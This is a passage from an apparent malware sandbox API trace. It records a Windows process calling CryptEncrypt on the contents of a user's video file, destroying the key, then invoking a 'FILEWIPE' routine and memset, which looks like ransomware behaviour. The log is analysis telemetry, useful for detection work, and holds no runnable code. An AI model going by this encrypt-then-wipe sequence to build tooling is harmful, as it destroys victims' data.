wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.403] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0199.403] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.403] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.403] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x28d3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x28e0) returned 1 [0199.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.404] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.404] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.404] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.423] CharLowerBuffW (in: lpsz="byte[10465]", cchLength=0xb | out: lpsz="byte[10465]") returned 0xb [0199.423] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.423] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.424] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.424] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbef1d8*, pdwDataLen=0x87e820*=0x28d3, dwBufLen=0x28e0 | out: pbData=0xbef1d8*, pdwDataLen=0x87e820*=0x28e0) returned 1 [0199.424] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.424] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.424] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.424] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.424] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.424] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.424] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0199.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.424] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.425] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.425] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.425] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0199.425] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.425] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0199.425] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.425] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.425] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0199.425] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.425] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.425] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.425] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.427] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.427] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.427] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0199.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.427] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.427] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.427] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0199.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.427] CryptDestroyKey (hKey=0x90af18) returned 1 [0199.427] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.427] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.427] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.428] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.428] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0199.428] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0199.428] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0199.428] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0199.428] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0199.428] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0199.428] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.428] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.428] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.428] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0199.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.428] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.429] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.429] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.429] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.429] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.429] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.429] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0199.429] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.429] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.429] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0199.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0199.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.429] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.429] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0199.429] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.430] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.430] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0199.430] FreeLibrary (hLibModule=0x74f20000) returned 1 [0199.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0199.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0199.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0199.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0199.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.430] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.431] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.432] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.433] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.433] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0199.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0199.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.433] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.433] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.433] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a38ea0, ftCreationTime.dwHighDateTime=0x1d5e37a, ftLastAccessTime.dwLowDateTime=0x39e54bc0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x39e54bc0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x28d3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gUuRkOGgEOvL1Ts9uT.mp4", cAlternateFileName="GUURKO~1.MP4")) returned 0x90af58 [0199.433] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0199.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0199.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.433] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.434] CharLowerBuffW (in: lpsz="byte[10451]", cchLength=0xb | out: lpsz="byte[10451]") returned 0xb [0199.434] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.434] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0199.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.434] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.434] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0199.434] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0199.434] FreeLibrary (hLibModule=0x75c90000) returned 1 [0199.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0199.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0199.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0199.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0199.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0199.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0199.434] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 